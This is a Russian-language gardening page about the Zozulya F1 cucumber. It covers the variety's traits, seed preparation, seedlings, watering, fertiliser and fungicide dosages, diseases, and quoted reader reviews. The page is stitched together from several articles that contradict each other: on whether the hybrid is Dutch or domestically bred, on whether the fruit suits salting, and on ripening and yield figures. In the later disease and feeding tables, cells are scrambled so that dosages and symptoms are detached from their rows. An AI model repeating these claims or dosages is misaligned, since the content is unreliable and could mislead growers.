1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание огурца зозуля

Описание огурца Зозуля

Голландская селекция произвела на свет большое количество разновидностей огурцов, которые прекрасно прижились в наших широтах, отличаются отменным качеством и прекрасными вкусовыми характеристиками. Огурец Зозуля можно назвать одним из лучших творений нидерландских селекционеров, проверенным многими фермерами России. В 1977 году он был внесен в Госреестр РФ как универсальный сорт.

Описание огурца Зозуля

Характеристика

Сорт огурцов Зозуля получен от скрещивания двух видов с различными генетическими данными. Это позволило получить качественный продукт, не содержащий горечи. Районирован огурец Зозуля f1 практически во всех регионах РФ.

Огурцы Зозуля f1 предназначены для выращивания:

  • в теплицах;
  • пленочных укрытиях;
  • на подоконнике;
  • в открытом грунте южных регионов.

Характеристика качественных данных продукта делает его болезнеустойчивым ко многим типичным заболеваниям огуречных культур. Вид относят к среднеспелым самоопыляемым сортам. Период созревания составляет 42 дня. Урожайность с 1 кв. м доходит до 20 кг.

Описание растения

Высота куста средняя. Плети нужно обязательно подвязывать. Листва крупная, темно-зеленая. Формирование завязей пучковое, что позволяет плодам созревать одновременно.

Описание плода

Описание качеств плода:

  • форма зеленца цилиндрическая, ровная;
  • поверхность среднебугристая, шипы слабо выражены;
  • кожица тонкая;
  • средняя длина — 20 см;
  • вес 160-200 г;
  • мякоть ароматная, сладковатая, без горечи.

Хрустящие огурчики прекрасно подходят для употребления в свежем виде и консервации. Термообработка не сильно влияет на упругость, поэтому в консервированном виде продукт сохраняет свои качества. Плоды долго сохраняют товарный вид, что позволяет транспортировать их на большие расстояния и использовать в коммерческой деятельности.

Преимущества и недостатки

Огурцы Зозуля f1 невосприимчивы к таким заболеваниям, как кладоспориоз, огуречная мозаика, корневая гниль. Одним из главных преимуществ является одновременное обильное плодоношение. Несомненным бонусом является саморегулируемое ветвление. Плоды долго сохраняют товарный вид.

Растения обладают иммунитетом не ко всем заболеваниям

Как и все культуры, огурцы сорта Зозуля имеют свои плюсы и минусы. У растений не развит иммунитет к настоящей и ложной росе, фузариозу и к нападениям вредителей. Засоленные плоды лучше употребить в первый год. На второй год хранения они теряют свои качественные показатели и становятся мягкими под воздействием рассола. К сожалению, размножение полученными семенами представленного вида невозможно.

Выращивание

Выращивание огурцов Зозуля — нелегкий труд. Для начала нужно продезинфицировать семенной материал. Замачивание в марганце позволит не только уничтожить бактериальную флору, но и отобрать полые семена: пригодные для проращивания семена опустятся на дно емкости с жидкостью, полые всплывут.

Чтобы рационально распределить время и ресурсы, перед посадкой проращивают семена. Непроросшие экземпляры следует сразу отбраковать. После вымачивания в марганце или солевом растворе следует взять отрез марли, поместить в тарелку и обильно смочить теплой водой. На ее поверхность выкладывают семена и прикрывают сверху вторым концом марли.

Получившийся сверток кладут в теплое место и регулярно смачивают его водой. Если описание производителя говорит о том, что материал уже был обработан активаторами роста, предварительное проращивание не требуется, так же, как и дезинфекция. Семена огурцов сорта Зозуля высеивают в мае при выращивании в открытом грунте. Если планируется посадка в тепличных условиях, сроки сдвигаются, в зависимости от микроклимата помещения.

Выращивание рассады

Для рассады берут готовую землесмесь или же готовят ее самостоятельно. Для изготовления землесмеси понадобится плодородная почва, песок, торф, органика. Самостоятельно смешанную почву нужно предварительно прокалить в духовом шкафу, чтобы обеззаразить. Лучше всего высеивать семена сразу в отдельные горшочки или стаканах. Лишняя пикировка является стрессом для растений и снижает их устойчивость к заболеваниям.

Полив рассады осуществляется раз в 2 дня. 2 раза за месяц рекомендуется провести подкормку мочевиной. В пасмурную погоду нужно дополнительно досвечивать растения.

Семена огурцов Зозуля f1 высеивают на глубину 1,5 см, сверху их присыпают грунтом. Горшки прикрывают пленкой. Снимают ее только после появления первых всходов. Пикировку проводят при появлении 4 здоровых листов.

Подготовка почвы

Грунт под посадку огурцов начинают готовить в осенний период, после уборки урожая. В теплице рекомендуют снимать верхний, отработанный слой почвы или перекапывать ее на глубину 5-10 см. В осенний период в почву вносят органику. При высадке в грунт нужно соблюдать правила севооборота. Лучшие предшественники огуречной культуры:

Перед весенней пикировкой вносят органику с раствором золы или суперфосфатные удобрения. Это помогает растениям справиться со стрессом и быстро пойти в рост. Прежде чем высаживать рассаду, примерно за сутки почву обильно поливают.

Посадка

Правильный уход за растением обеспечивает хороший урожай

Посадка проводится по схеме 50 х 30. Рассаду перед посадкой закаляют. Для этого ее переставляют днем в более прохладное помещение, а на ночь заносят назад.

Перед посадкой будет нелишним обработать грядки Фитоспорином. Вместо него за 3 недели до посадки можно использовать конский навоз или за 2 недели — птичий помет. Оптимальная температура воздуха в теплице или на улице при пересадке должна составлять 25℃.

Правильный уход за огурцами сорта Зозуля — залог высокой урожайности. До начала цветения полив осуществляется раз в 4-5 дней. Не следует поливать растения под корень. Оптимальный вариант, особенно для теплицы, — система капельного полива. Во время активации формирования завязей полив осуществляют раз 2 дня.

В период активного роста растений может наблюдаться оголение прикорневой зоны, поэтому рекомендуют хотя бы 2 раза провести окучивание. Чтобы обеспечить хорошую урожайность и оградить растения от появления грибковых заболеваний, рекомендуют установить специальные шпалеры для подвязывания. До начала цветения 2 раза проводят подкормку мочевиной и суперфосфатами. Прищипывание точки роста способствует улучшению развития боковых побегов.

Болезни и вредители

Сорт Зазуля Ф1 устойчив ко многим типичным заболеваниям огуречных культур, но при неправильном уходе, повышении влажности, перепадах температур наблюдается быстрое развитие грибковых заболеваний. При появлении настоящей и ложной росы, фузариоза, рекомендуется сразу удалить пораженные части растений. Обработать здоровые экземпляры можно препаратом «Фитоверм», раствором медного купороса или бордосской жидкостью.

В тепличном помещении регулируют температуру. При выращивании в открытом грунте удаляют все нижние листья со стебля. Как в отрытом грунте, так и в теплице прекрасно себя чувствует такой вредитель, как белокрылка. С мотыльком борются при помощи клейких ловушек, листья обрабатывают мыльным раствором. При появлении паутинного клеща обычно практикуют обработку перечным раствором.

Огурцы Зозуля: как получить быстрый урожай вкусных плодов

Среди садоводов и огородников выращивание овощей на укрытых участках почвы становится все более распространённым. Овощи в них менее зависят от погоды и могут быть выращены значительно быстрее. В таких условиях превосходно чувствуют себя огурцы, но для получения хорошего урожая нужно правильно выбрать сорт. Им может стать Зозуля.

Описание огурцов сорта Зозуля

Зозуля — огуречный сорт, выведенный отечественными селекционерами. Он был включён в Госреестр селекционных достижений в 1977 году и районирован по большинству российских регионов, среди них:

  • Северный;
  • Северо-Западный;
  • Центральный;
  • Волго-Вятский;
  • Центрально-Чернозёмный;
  • Северо-Кавказский;
  • Средневолжский.

Рекомендуется к выращиванию в закрытом грунте. Урожайность — от 10 до 12 кг на 1 м 2 . Собирать первые плоды можно уже через 46–48 дней после появления всходов. Огурцы обычно имеют длину от 14 до 24 см. Их масса составляет 150–300 г. Плоды цилиндрические, иногда с небольшим изгибом. Кожица тонкая, на ней есть небольшие бороздки и редкие бугорки. Цвет насыщенно-зелёный. Огурцы не перерастают, могут долго сохранять товарный вид. Плоды вкусны, годятся для салатов и консервации.

Сорт может плодоносить без опыления насекомыми.

Огурцы этого сорта неприхотливы, хорошо реагируют на подкормки, могут без вреда для роста подвергаться перепадам температур. Для хорошего урожая огурцы требуют регулярный полив. Они устойчивы к болезням:

  • аскохитоз;
  • огуречная мозаика;
  • корневая гниль;
  • оливковая пятнистость.

Масса огурцов Зозуля — от 150 до 300 г

Таблица: плюсы и минусы

Достоинства Недостатки
Простой уход: нет необходимости в пасынковании, образует завязи без насекомых-опылителей. Для получения хорошего урожая должен выращиваться в защищённом грунте.
Высокая устойчивость к ряду заболеваний.
Быстрое созревание плодов.
Высокая урожайность.
Хорошие вкусовые качества.

Посадка

Для времени посадки огурцов этого сорта обычно подходит вторая половина мая. Но до этого нужно подготовить рассаду.

    Для посадки лучше всего использовать торфяные горшочки, которые можно приобрести в специализированном магазине. Там же можно купить универсальный грунт для рассады.

Чтобы не травмировать растения при пересадке, используют торфяные ёмкости

Семена огурца проращивают на влажной марле или хлопчатобумажной ткани

Для появления огуречных всходов требуется более высокая температура, чем для их развития

Рассаду каждые 1–2 дня поливают тёплой водой

Высадка рассады

К высадке готова рассада, которая росла от 20 до 25 дней. Растения, на которых появились 3–4 листа, аккуратно достают из ёмкости (если она торфяная, то высаживают прямо в ней). Необходимо, чтобы земляной ком хорошо пронизывался корнями, но не распадался. Рассаду переносят на грядки.

На 1 м2 должны расти 3–4 растения.

Урожай сорта Зозуля будет гораздо выше, если выращивать огурцы в закрытом грунте

Видео: высадка рассады огурцов Зозуля

Уход за огурцами

Правила ухода для огурцов Зозуля:

  • подвязка к опорам огуречных плетей;
  • междурядья необходимо регулярно пропалывать и рыхлить;
  • полив должен проводиться регулярно. На один молодой куст расходуется 0,5 л воды, на взрослый — 1 л. До цветения интервал полива составляет от 3 до 7 дней, после завязи первых огурцов — от 2 до 4 дней;
  • необходимо делать подкормку органическими и минеральными удобрениями;
  • период снятия урожая должен быть от 2 до 4 дней. Это будет стимулировать рост новых плодов.

Подкормки

Для подкормки Зозули хорошую эффективность даёт совместное использование органических и минеральных удобрений, таких как:

  • нитрофоска;
  • сульфат калия;
  • аммиачная селитра;
  • мочевина;
  • настой куриного помёта.

Хорошо вносить эти удобрения не только под корневое пространство, а также по листу.

Таблица: составы подкормок для огурцов

Чем подкармливать Как приготовить удобрение Когда и как вносить
Нитрофоска, куриный помёт Растворить в 10 л воды 1 ст. л. нитрофоски и 1 ст. жидкого настоя помёта. В фазе 1 настоящего листка, 2–2,5 л под каждый куст.
Сульфат калия, куриный помёт На 10 л воды 1 ч. л. сульфата калия и 2 ст. помёта. В фазе 2 настоящего листка, 2–2,5 л под каждый куст; вторую обработку проводить через 2–3 недели после предыдущей, вносить подкормку под корень.
Мочевина или аммиачная селитра 10 г селитры или 20 г мочевины на 5 л воды. В начале цветения вечером опрыскивать растения.

Борьба с болезнями и вредителями

Несмотря на свою устойчивость ко многим болезням, огуречные кусты могут быть подвержены некоторым заболеваниям и страдать от вредителей. Особенно это может проявляться в теплицах, так как там повышена влажность и температура.

Таблица: меры профилактики и борьбы с болезнями огурцов

Болезнь Признаки Причины возникновения Профилактика и лечение
Антракноз Листовые пластинки покрываются массой округлых бурых пятен, на стебле вдавленные бурые области. Плоды горькие, очень быстро гниют. Высокая влажность при температуре 22–28 о С.
  1. Посев только протравленных семян.
  2. Поддерживание оптимального микроклимата в теплице.
  3. Опрыскивание 1%-й бордоской жидкостью (10 г медного купороса и 10–12 г извести на 1 л воды).
Бактериоз Коричневые угловатые пятнышки по листьям, на месте которых образуются дыры. Плоды водянистые, искривлённые, с язвами. Заражённые семена, высокая влажность в сочетании с низкой температурой.
Ложная мучнистая роса На листьях жёлтые пятна с фиолетовым налётом. Впоследствии лист выворачивается наружу и засыхает. Влажность 90–100% в сочетании с высокой температурой (19–22 о С) и солнечной активностью. Заражённые семена.
  1. Посев только протравленных семян.
  2. Поддерживание оптимального микроклимата в теплице.
  3. Обработки фунгицидами.
Мучнистая роса На нижней стороне листа появляется белый налёт, который переходит на внешнюю сторону и со временем темнеет. Плоды горькие, уродливые. Резкие перепады температуры и освещённости, заражённая земля или посевной материал.
  1. Дезинфекция теплицы.
  2. Протравливание семян.
  3. Поддержание стабильного микроклимата.
  4. Опрыскивание сильнодействующими фунгицидами.

Фотогалерея: признаки заболеваний на огуречных кустах

Таблица: фунгициды для борьбы с болезнями огурцов

Название препарата От каких болезней эффективен Дозировка и приготовление Способы обработки
Топаз Ложная и настоящая мучнистая роса. 1 ампулу эмульсии развести в 10 л воды. 3 обработки с интервалом 10–14 дней.
Оксихом Антракноз, ложная мучнистая роса. 20 г развести в 10 л воды. 3 обработки через 10–14 дней.
Фундазол Серая и корневая гниль, пятнистость, мучнистая роса. 10 г на 10 л воды. 2 обработки с интервалом 1–2 недели.
Ридомил голд Альтернариоз, пероноспороз, фитофтороз. 50 г развести в 10 л воды. 2–3 обработки через 10–14 дней.

Отзывы о осрте огурцов Зозуля

При подсаживании других сортов или гибридов огурцов Зозуля вырастает уродливой и саблевидной, и иногда не завязывает плоды. А просто самостоятельно без других огурцов вырастает ровной и длинненькой до 30 см. Я так заметил уже второй год. Я Зозулю сажаю уже 2 года отдельно от огурцов (в помидорной теплице). Хватит 7–8 кустов Зозули для меня.

Чарли 83

http://forum.prihoz.ru/viewtopic.php?t=788

Сажал, сажаю и буду сажать Зозулю. Замечательная штука — и в салате очень хороша, и в маринованном виде — хрустящая, плотная, и хотя огурцы крупные, пустотелых в банках практически не бывает.

Пензяк

http://dacha.wcb.ru/index.php?showtopic=16591

Зозулю выращиваю уже много много лет и сажаю её всегда отдельно на компостной куче. Сажаю всего 5 растений, а потом идёт просто шквал урожая. Только есть успевай и соседям раздавай. Пряменькие, красивые.

alex515

http://forum.prihoz.ru/viewtopic.php?t=788

Это огурцы специально для салата, потому что они большие, длинные и такие сочные вырастают. Когда мы их посадили, и они начали расти и потом завязываться, то мы обрадовались, что огурцов будет достаточно много. И правда, огурцов хоть и не много посажено было, но все же плодов было достаточно много и урожай мы собрали не плохой. Огурцы вырастают довольно длинные и совершенно не колючие, как это бывает у других сортов. Они настолько ароматные, что, когда их режешь, просто уже хочешь скушать целиком.

lenava

http://otzyvy.pro/reviews/otzyvy-ogurec-zozulya-34272.html

Огурцы Зозуля снабдят семью вкусными плодами, содержащими многие необходимые витамины. Уход за ними несложен и выполним для многих овощеводов. Поэтому, несмотря на некоторые недостатки, эти огурцы могут быть рекомендованы овощеводам для посадки под укрытием и в открытом грунте.

Сорт огурцов Зозуля F1 — проверенный временем гибрид

Современные огородники активно используют парники и теплицы, чтобы получить урожай как можно раньше. Специально для закрытого грунта создано множество сортов, а селекционная работа постоянно продолжается. Огурец Зозуля F1 выведен именно для этих целей более 30 лет назад. Несмотря на изобилие новых гибридов, Зозуля не сдаёт позиций и все так же любима многими овощеводами.

Описание сорта

Огурец Зозуля F1 был выведен отечественными селекционерами на базе Овощной опытной станции имени В.И. Эдельштейна. Сорт подходит для большинства регионов. Может выращиваться в открытом грунте, но стабильно высокие урожаи даёт лишь под плёночным укрытием.

Зозуля — гибрид раннего срока созревания. Первые огурчики можно снимать через 42–48 дней после посадки. В начале плодоношения урожайность небольшая — 8–16 кг с квадратного метра. Однако через месяц образование завязи набирает обороты и с одного квадратного метра можно собрать до 20 кг плодов.

Плоды вырастают длиной 14–24 см и массой 150–300 г. Форма огурцов цилиндрическая, иногда с небольшим изгибом. Кожица тонкая, насыщенно-зелёного цвета со слабовыраженными бороздками и редкими бугорками. Мякоть с мелкими семенами, плотная и ароматная. Плоды долго сохраняют товарный вид и не перерастают.

Плоды огурца сорта Зозуля вырастают до 24 см

Эти огурцы очень хороши в свежем виде для салатов. Для солений они не подходят, т. к. быстро становятся мягкими. Исключение составляют лишь рецепты быстрого маринования, так называемые малосольные огурцы, где Зозуля вполне уместна. Хранить собранные огурцы можно 3–5 дней в холодильнике или подвале. Длительного хранения Зозуля не выдерживает, плоды сморщиваются и теряют свои вкусовые качества.

Кусты у Зозули слабоплетистые, практически не образуют пасынков, что значительно упрощает уход за ними. Цветки частично партенокарпические и не требуют для опыления участия насекомых. Растения сильнорослые. Для нормального развития их высаживают не более 2–3 штук на метр квадратный.

Партенокарпический огурец — такой сорт или гибрид, который способен образовывать плоды без опыления.

Огурцы этого сорта неприхотливы, отзывчивы к подкормкам, без ущерба для роста переносят перепады температуры. Устойчивы к оливковой пятнистости, огуречной мозаике и корневым гнилям.

Сравнительная таблица достоинств и недостатков сорта Зозуля F1

Достоинства

Ранние сроки созревания урожая

Простота в уходе за счёт отсутствия необходимости пасынкования и привлечения насекомых-опылителей

Неприхотливость и устойчивость к некоторым заболеваниям

Нежный вкус плодов

Видео: гибрид Зозуля F1

Выращивание огурцов

Вырастить Зозулю можно двумя способами: посеять семена сразу в грунт или через рассаду. Рассадный способ более трудоёмок, но позволяет получить крепкие растения и самый ранний урожай.

Важно! Огурцы Зозуля — гибридный сорт, поэтому не стоит пытаться вырастить урожай из собственноручно собранных семян.

Выбор места и подготовка почвы

Для теплицы под огурцы выбирают солнечный, ровный участок, желательно защищённый от северного ветра. Почва должна быть с нейтральной кислотно-щелочной реакцией, лёгкой и плодородной. Если качество грунта оставляет желать лучшего, теплицу заполняют смесью из торфяной, дерновой земли и перегноя в соотношении 5:2:3. Такой субстрат укладывают слоем не менее 15–20 см.

Накануне посадки любой грунт обеззараживают. Для этого в 10 л горячей воды растворяют 3 г марганцовки и лейкой с распылителем обильно поливают землю.

Совет! Удобнее всего сажать огурцы в неглубокие рядки с междурядьем 50–60 см.

В теплице для огурцов создаётся идеальный микроклимат

Посев семян сразу в грунт

Под плёночными укрытиями такой метод применяют довольно редко, однако, если нет возможности вырастить рассаду, им вполне можно пользоваться.

Семена перед посевом заливают водой на 30–60 минут. Все всплывшие семечки выбрасывают, они всё равно не прорастут, а утонувшие прополаскивают, заворачивают во влажную тряпочку и оставляют в теплом месте на 1–3 дня. Как только проклюнутся ростки, приступают к посеву.

В рядках делают лунки через каждые 30–35 см. На дно каждой ямки высыпают горсть перегноя, по 0,5 ч. л. суперфосфата и калийной соли, после чего выливают туда же 0,3–0,5 литра воды. Когда влага впитается, высевают по три семечка и присыпают сухой землёй.

Важно! Огурцы начинают сеять только тогда, когда воздух в теплице прогреется до +20–25 градусов.

Проросшие огурцы прореживают, оставляя в лунке по одному самому сильному растению.

Выращивание огурцов рассадой

При рассадном методе выращивания важно, чтобы каждое семечко взошло и превратилось в полноценное растение. Для этого подготовку посадочного материала начинают задолго до посева. Семена должны пройти такие этапы:

Прогревание

Часто случается, что даже хорошие семена огурцов не хотят всходить. Чтобы пробудить их к жизни, применяют прогревание. За 1,5–2 месяца до посева пакетики с огурцами кладут поближе к отопительным приборам, там, где температура держится в районе 27–30 градусов. Процесс можно сократить до 2–3 дней, выдерживая посадочный материал при температуре 40 градусов. Прогревание способствует появлению дружных всходов, увеличивает количество женских цветков на кустах.

Калибровка

Калибровку проводят так же, как и при посеве огурцов в грунт. Семена заливают чистой водой или светло-розовым раствором марганцовки, через час сливают воду вместе со всплывшими нежизнеспособными семечками.

Проращивание

Откалиброванные огурцы заворачивают во влажную ткань и оставляют на несколько дней при температуре 28–30 градусов до появления ростков.

Совет! Не стоит заворачивать семена в марлю. Корешки ростков очень быстро запутаются в крупных ячейках материала и будет трудно извлечь их оттуда не повредив.

Подготовленные семена сеют в стаканчики или крупные кассеты, наполненные тепличной землесмесью. С момента посева и до появления всходов поддерживают температуру 25–28 градусов. Когда сеянцы выпустят первый настоящий листок, температуру понижают до 20–22 градусов для предотвращения вытягивания рассады.

Подрастающие кустики регулярно поливают, следят, чтобы световой день был не менее 13–15 часов, и периодически проветривают. Через 20–25 дней рассада Зозули готова к высадке в теплицу. Идеальное время для посадки — третья декада мая.

На рядках выкапывают лунки глубиной 12–15 см, добавляют в каждую немного перегноя, по 0,5 ч. л. суперфосфата и калийной соли, обильно заливают водой по самые края. Рассаду аккуратно вытряхивают из горшочков, не нарушая земляной ком, и помещают в ямки. Засыпают землёй, слегка утрамбовывают. Корневая шейка растений должна остаться на прежнем уровне, то есть её не нужно заглублять или располагать выше уровня грунта.

Через 20–25 дней рассада Зозули готова к высадке в теплицу

Уход за Зозулей

Чтобы огурцы давали обильный урожай, необходимо соблюдать несложные правила:

  1. Огуречные плети обязательно подвязывают к опорам.
  2. Междурядья содержат чистыми от сорняков и регулярно неглубоко рыхлят.
  3. Растения на протяжении всего сезона обильно поливают.
  4. Проводят подкормки минеральными удобрениями и органикой.
  5. Раз в 3–5 дней снимают урожай, т. к. частые сборки стимулируют образование новых огурчиков.

Полив

Огурцы Зозуля очень требовательны к влаге. Даже непродолжительная засуха снижает количество завязи. На одно молодое растение за один полив расходуют 0,5 л воды, а на взрослый куст 1 л. До цветения грядки увлажняют каждые 5–7 дней. Когда распустятся первые цветы и начнут завязываться огурчики — каждые 2–4 дня.

Совет! Часто плоды огурцов горчат. Чтобы этого не произошло, не допускают пересыхания почвы и поливают грядки только тёплой водой. Холодная вода из скважины или колодца способствует появлению горечи.

Подкормка

Зозуля очень отзывчива к удобрению. Наилучший результат дают комбинированные органико-минеральные подкормки. Рекомендуется вносить питательные вещества не только под корень, но и по листу.

Лучшие препараты для подкормки ранних огурцов:

  • нитрофоска;
  • сульфат калия;
  • аммиачная селитра;
  • мочевина;
  • настой куриного помёта.

На заметку! Концентрированный настой куриного помета приготовить очень просто. Сухой помет заливают водой 1:1, плотно закрывают тару и настаивают 3–7 дней. Используют только в разведённом виде.

Таблица: схема подкормок огурцов

Чем подкармливать

Нитрофоска, куриный помёт

В фазе 1 настоящего листка, 2–2,5 литра под каждый куст.

Сульфат калия, куриный помет

Мочевина или аммиачная селитра

Недостатки
Для обильного плодоношения необходимо выращивать только в защищённом грунте
Непригодность плодов к засолке
Как приготовить удобрение Когда и как вносить
Растворить в 10 л воды 1 ст. л. нитрофоски и 1 стакан жидкого настоя помёта. На 10 л воды 1 ч. л. сульфата калия и 2 стакана помёта. В фазе 2 настоящего листка, 2–2,5 литра под каждый куст; вторую обработку проводить через 2–3 недели после предыдущей, вносить подкормку под корень.
На выбор: 10 г селитры или 20 г мочевины на 5 л воды. В начале цветения вечером опрыскать растения.

Фаза настоящих листьев характеризуется появлением листочков, характерных именно для того или иного растения

Болезни и вредители огурцов Зозуля

Этот гибрид не поражают такие недуги, как оливковая пятнистость, корневая гниль, вирус огуречной мозаики. Однако растения могут пострадать от аскохитоза, антракноза, бактериоза, ложной и настоящей мучнистой росы. В теплицах огурцы особенно подвержены грибковым заболеваниям за счёт повышенной температуры и влажности.

Таблица: болезни сорта и меры борьбы с ними

Болезнь

На стебле и черешках листьев водянистые пятна с чёрными точками, стебель вокруг сухой, мочалистый. На листве обширные бурые пятна с чёрными точками.

Ложная мучнистая роса

Признаки Причины возникновения Профилактика и лечение
Аскохитоз Повышенная влажность, ослабленные растения. Проветривание теплицы, сжигание остатков больных растений, обработки фунгицидами.
Листовые пластинки покрываются массой округлых бурых пятен, на стебле вдавленные бурые области. Плоды горькие, очень быстро гниют. Высокая влажность при температуре +22–28 градусов.
Коричневые угловатые пятнышки по листьям, на месте которых образуются дыры. Плоды водянистые, искривлённые, с язвами. Заражённые семена, высокая влажность в сочетании с низкой температурой. Посев только протравленных семян, поддерживание оптимального микроклимата в теплице, опрыскивание бордоской жидкостью 1% (10 г медного купороса и 10–12 г извести на 1 л воды).
На листьях жёлтые пятна с фиолетовым налётом. Впоследствии лист выворачивается наружу и засыхает. Влажность 90–100% в сочетании с температурой +19–22 градуса и высокой солнечной активностью. Заражённые семена. Посев только протравленных семян, поддерживание оптимального микроклимата в теплице, обработки фунгицидами.
На нижней стороне листа появляется белый налёт, который переходит на внешнюю сторону и со временем темнеет. Плоды горькие, уродливые. Резкие перепады температуры и освещённости, заражённая земля или посевной материал. Дезинфекция теплицы, протравливание семян, поддержание стабильного микроклимата, опрыскивание сильнодействующими фунгицидами.
Зеленоватых или чёрных насекомых видно невооружённым глазом. Листья становятся бугристыми, скручиваются. Растение останавливается в росте. В теплице тля появляется довольно редко, в основном заносится туда с больной рассадой. Опрыскивание инсектицидами Децис, Арриво.

Фотогалерея: внешний вид недугов Зозули

Таблица: самые эффективные препараты для борьбы с болезнями огурцов

Название препарата От каких болезней эффективен Дозировка и приготовление Способы обработки
Ложная и настоящая мучнистая роса 1 ампулу эмульсии развести в 10 л воды Три обработки с интервалом 10–14 дней
Антракноз, ложная мучнистая роса 20 г развести в 10 л воды Три обработки через 10–14 дней
Фундазол Серая и корневая гниль, пятнистость, мучнистая роса 10 г на 10 л воды Две обработки с интервалом 1–2 недели
Ридомил голд Альтернариоз, пероноспороз, фитофтороз 50 г развести в 10 л воды Две — три обработки через 10–14 дней
Арриво Тля 5 мл на 10 л воды Две обработки за сезон

Отзывы об огурцах Зозуля F1

Огурцы Зозуля F1 выращиваем на даче каждый год. Сначала в конце апреля семена замачиваем под мокрой марлей до появления первых ростков, затем высаживаем в специально подготовленные домашние ящики и уже в конце мая садим в теплицу.

маргаритки

http://otzovik.com/review_1170254.html

Длинные и вкусные салатные огурцы — это старый сорт Зозуля.

Oxata**K**

Я каждый год сажаю в открытый грунт. первые огурцы вырастают нормальными-длинными и ровными. Кривыми они могут вырастать в конце плодоношения. Но вообще-то это сорт рекомендован для теплиц.

Ирэн

https://otvet.mail.ru/question/89805642

Гибрид Зозуля можно смело рекомендовать как начинающим, так и опытным огородникам. Неприхотливость, стабильная урожайность и длительное плодоношение сделали этот сорт одним из самых популярных.

Огурцы сорта Зозуля: как выращивать и собрать хороший урожай?

Сорт Зозуля известен уже не одно десятилетие. В Госреестре РФ он числится еще с 1977 года. Зозуля подходит для большинства российских регионов и обладает массой достоинств. Получить высокую урожайность и должные вкусовые качества поможет правильное выращивание культуры.

Описание сорта огурцов

Зозуля является гибридным сортом. Место его выведения – Овощная опытная станция имени В. И. Эдельштейна.

Растение является слабоплетистым и частично партенокарпическим – для формирования завязей опыление не требуется, хотя оно увеличивает урожайность. Культура неприхотлива, хорошо выдерживает неблагоприятную погоду. Выращивать Зозулю можно и в защищенном, и в открытом грунте.

Для огурцов Зозуля характерна цилиндрическая форма и темно-зеленый цвет. Возможен небольшой изгиб. Плодам свойственны редкие крупные бугорки, выраженные продольные полосы, легкие борозды, шипы белого цвета.

Огурцы Зозуля привлекательны тонкой кожицей и плотной, сочной и сладковатой мякотью с отличным вкусом. Плоды достигают в длину 14-24 см, масса составляет в среднем 160-300 г.

Урожайность сорта Зозуля достойна. До 10-15 кг огурцов с 1 кв. м можно собрать уже в первый месяц. Затем урожайность возрастает до 20 кг и выше.

Достоинства и недостатки

Зозуля является популярным сортом уже около полувека. Это обусловлено множеством его достоинств:

  • неприхотливость;
  • стойкость к неблагоприятным погодным условиям;
  • частичная партенокарпичность;
  • ограниченное боковое ветвление – не требуется прищипывание, пасынкование;
  • высокая отзывчивость к удобрениям;
  • устойчивость к грибковым и вирусным заболеваниям;
  • продолжительное плодоношение;
  • высокая урожайность;
  • долгое сохранение товарного вида без желтизны;
  • отличный вкус;
  • универсальное использование – в свежем виде, для консервации.

Недостатков у Зозули практически нет.

К их числу относят меньшую урожайность при выращивании в открытом грунте и непригодность к засолке, что не исключает другие способы консервирования.

Требования к почве

Для выращивания огурцов важно выбрать правильный участок. Он должен быть ровным и солнечным, желательна защищенность от северного ветра.

Не менее важны характеристики почвы: легкость, плодородность, нейтральная кислотно-щелочная реакция. При недостаточном качестве грунта необходимо уложить субстрат слоем в 15-20 см. Для этого используется:

  • торфяная земля – 5 частей;
  • перегной – 3 части;
  • дерновая земля – 2 части.

Перед посадкой независимо от характеристик грунта требуется его обеззараживание. Используют для этого марганцовку – по 3 грамма кристаллов на 10-литровое ведро. Для приготовления раствора берется горячая вода. Полученный состав используют для обильного полива – удобно производить его лейкой с распылителем.

Правила посева семян, посадки рассады

При выращивании Зозули предпочитают делать это рассадой. При отсутствии такой возможности семена можно посадить прямо в грунт под пленочное укрытие. Весь процесс осуществляется по следующему алгоритму:

  1. Замачивание. Делается это для выбраковки семян – выбросить надо все, что всплыло – такие семена все равно не прорастут. Замачивать их нужно не дольше чем на час – достаточно и получаса.
  2. Отобранные семена надо прополоскать, завернуть во влажную ткань и положить в теплое место. Держать так их надо до 3 дней, пока они не проклюнутся. После этого сразу же приступать к посеву.
  3. В заранее подготовленном грунте надо сделать лунки на расстоянии 30-35 см. В каждое углубление надо поместить горсть перегноя, калийную соль и суперфосфат по 0,5 ч. л. В каждую лунку после закладки удобрения влить 0,4-0,5 л воды.
  4. Семечки помещать в лунки по 3 штуки. Делать это надо, когда влага впитается, присыпать углубления сухой землей.
  5. После прорастания проредить растения – в лунке должен оставаться один, но самый крепкий экземпляр.

Посев семян в защищенный грунт производится, когда температура в теплице будет не ниже 20 градусов.

При использовании сорта Зозуля большинство огородников предпочитает выращивание рассадой. В этом случае особое внимание надо уделить подготовке семян, чтобы получить максимальное число всходов. Важно соблюдение следующих этапов:

  1. Прогревание. Начинать процесс надо за 7-8 недель до посева. Для этого пакетики с семенами помещают в тепло – необходима температура в 27-30 градусов, например, рядом с отопительным прибором. Прогревание можно осуществить и экспресс-методом в течение 3 дней. Для этого температуру надо повысить до 40 градусов.
  2. Калибровка. Алгоритм аналогичен выбраковке при посадке семенами: залить чистой водой и выбросить материал, который не опустился на дно емкости.
  3. Проращивание. Семена надо оставить во влажной ткани на несколько дней. Температура должна держаться на уровне 28-30 градусов. После проклевывания высаживать рассаду.
  4. Для рассады можно использовать специальные кассеты, стаканчики. Для их наполнения рекомендуется использовать смесь для теплиц. Пока не появятся всходы, необходим температурный режим в 25-28 градусов, после появления первого настоящего листка ее надо понизить до 20-22 градусов, иначе рассада будет вытягиваться.
  5. Важен регулярный полив рассады и обеспечение достаточного светового дня – от 13 часов. Необходимо периодическое проветривание.
  6. Высаживать в теплицу рассаду можно примерно через 3 недели. Лучше планировать такое мероприятие на третью декаду мая.
  7. Для высадки рассады сделать лунки – глубина до 15 см. Добавить удобрения: перегной, калийная соль, суперфосфат по 0,5 ч. л. Воду залить до краев углубления. Рассаду высаживать с земляным комом, не нарушая его. Подсыпать землю, слегка утрамбовать. Высаживать рассаду на такую же глубину, как в горшочках (стаканчиках).

Уход после посадки

После посадки ухаживать за Зозулей достаточно просто. Уход подразумевает регулярную прополку и неглубокое рыхление междурядий. Делать это лучше после полива.

Зозуле нужно много влаги, поэтому полив должен быть обильным в течение всего сезона. Даже при непродолжительной засухе количество завязей снизится. Рекомендуется расходовать по пол-литра воды на молодые растения и по литру на взрослые кусты. Перед цветением полив осуществляют раз в 5-6 дней, а после него – 2-3 раза в неделю.

Для полива огурцов Зозуля рекомендуется использовать теплую воду. Если она будет холодной либо полив будет недостаточным, то плоды станут горчить.

